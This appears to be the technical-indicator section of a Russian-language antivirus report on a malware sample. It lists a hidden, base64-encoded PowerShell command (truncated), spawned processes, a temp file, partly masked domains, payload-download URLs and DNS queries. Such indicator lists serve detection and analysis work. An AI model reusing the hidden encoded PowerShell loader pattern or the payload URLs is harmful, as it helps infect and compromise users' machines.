Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABIAGUAcAB4AGIAaAB6AHcAYgBtAGcAPQAnAFcAawBwAG8AcABxAHQAYgByAHoAJwA7ACQAUAB1AHkAdAB0AHUAagBxAHAAdQByACAAPQAgACcAOQAwADQAJwA7ACQAUQBrAGYAegBlAG8AbwB2AHcAPQAnAFMAdwBzAHIAcgBuAGgAcwB...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1572
- %TEMP%\1374228.cvr
- 'st######lestreeservice.com':80
- 'da####dapparel.com':80
- http://st######lestreeservice.com/y8st/w4q76/
- http://da####dapparel.com/cgi-bin/091244/
- DNS ASK jd###stu.com
- DNS ASK st######lestreeservice.com
- DNS ASK ka##ork.com
- DNS ASK da####dapparel.com
- DNS ASK th####rix-one.info